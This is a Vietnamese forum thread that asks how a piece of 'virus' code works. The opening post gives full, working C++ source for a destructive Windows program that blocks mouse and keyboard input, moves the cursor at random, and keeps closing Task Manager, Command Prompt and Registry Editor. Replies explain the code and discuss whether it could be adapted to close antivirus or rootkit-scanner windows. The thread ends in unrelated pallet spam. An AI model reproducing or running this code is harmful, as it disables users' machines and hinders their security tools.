-
18-01-2012, 09:57 AM #1Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Code virus viết trên VC++ hoạt động như thế nào?
Code
Mã:#include <windows.h>#include <winable.h> HWND mywindow, TaskMgr, CMD,Regedit; //hwnd la` DWORD WINAPI DestroyWindows(LPVOID); int main(){ int x,y; CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL); while(1) { BlockInput( true ); Sleep(6); x = rand()%801; y = rand()%601; SetCursorPos(x,y); } return 0;} DWORD WINAPI DestroyWindows(LPVOID) { while(1) { TaskMgr = FindWindow(NULL,"Windows Task Manager"); CMD = FindWindow(NULL, "Command Prompt"); Regedit = FindWindow(NULL,"Registry Editor"); if( TaskMgr != NULL ) { PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( CMD != NULL ) { PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0); } if( Regedit != NULL ) { PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0); } Sleep(10); }}
Nếu muốn đổi tắt regedit sang một cái khác ví dụ như mấy cái thông báo bản quyền của av thì nó có tắt luôn cái av không?
Nguồn ddthView more random threads:
- Lập trình Virus | Cách tạo Key khởi động cho Virus
- Bắt đầu lập trình Virus và AntiVirus, kiến thức cơ bản cần gì?
- Viết virus để làm gì?
- Mã nguồn virus viết bằng C(củ chuối)
- SimpleAV | Mã nguồn Anti Virus đơn giản viết trên VC++ 2005
- Khẩn cấp diệt con bot trên máy các bạn !
- Cách chống kill thread cho phần mềm anticheat có cơ chế hoạt động giống một chương trình antivirus?
- Đây có phải là trojan không ạ
- Debug xem task manager tắt file bằng hàm api nào
- học phần mềm có làm được trình duyệt viruts không?
-
18-01-2012, 11:01 AM #2Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
_ Khóa chuột, phím.
_ set vị trí chuột random.
_ không cho bật : Windows Task Manager, CMD, Registry.
+ nếu bạn đọc hiểu code này bạn sẽ viết được thứ mà bạn muốn hỏi. nhưng tắt cái av thì khoai đấy [IMG]images/smilies/17.gif[/IMG]
Đây chưa gọi là virus được .
-
18-01-2012, 02:43 PM #3Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
à,hiểu rồi,nếu thay mấy cái như Registry Editor thành một cái gì đó khác thì nó cũng như vậy phải không?
-
19-01-2012, 04:36 PM #4Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Gửi bởi luongtankhang123
-
20-01-2012, 10:23 AM #5Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Được tắt được XueTR!!!
-
25-01-2012, 01:23 PM #6Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Code trên liệu có ngốn tài nguyên quá ko nhỉ? [IMG]images/smilies/thinking.gif[/IMG]
-
25-01-2012, 02:56 PM #7Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Gửi bởi quandaso
-
27-01-2012, 04:13 PM #8Administrator
- Ngày tham gia
- Feb 2014
- Bài viết
- 0
Đây không phải virus, nó đơn giản là một phần mềm phá hoại, ko có khả năng chạy tự động và nhân bản.
Muốn tắt được AV thì bạn không có khả năng, muốn làm thế bạn phải can thiệp vào SERVICE, riêng cái quyền can thiệp này đã được chống bởi AV. Các virus hiện tại thường can thiệp không cho phân giải được tên miền của các trang antivirus, hay nếu phát hiện cửa sổ Install của Anti thì kill chứ ko cái nào tắt đc AV cả :P
-
30-01-2012, 04:45 PM #9Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Gửi bởi luongtankhang123
>> XueTR nó tạo 1 string ngẫu nhiên để đăng kí windows class và windows name bạn ạ. Bạn chưa thử thì đừng nói bừa. Ko chơi cách dùng Process name vì cách đó vượt qua quá dễ
-
01-02-2012, 04:16 PM #10Junior Member
- Ngày tham gia
- Sep 2015
- Bài viết
- 0
Gửi bởi quangnh89
Dưới ánh nắng mặt trời đang lên, những đống pallet nhựa An Giang trải dài mênh mông như những bức tranh tự nhiên đầy sắc màu. Mỗi chiếc pallet nhựa không chỉ là một vật dụng thông thường mà còn là...
Pallet nhựa An Giang giao hàng...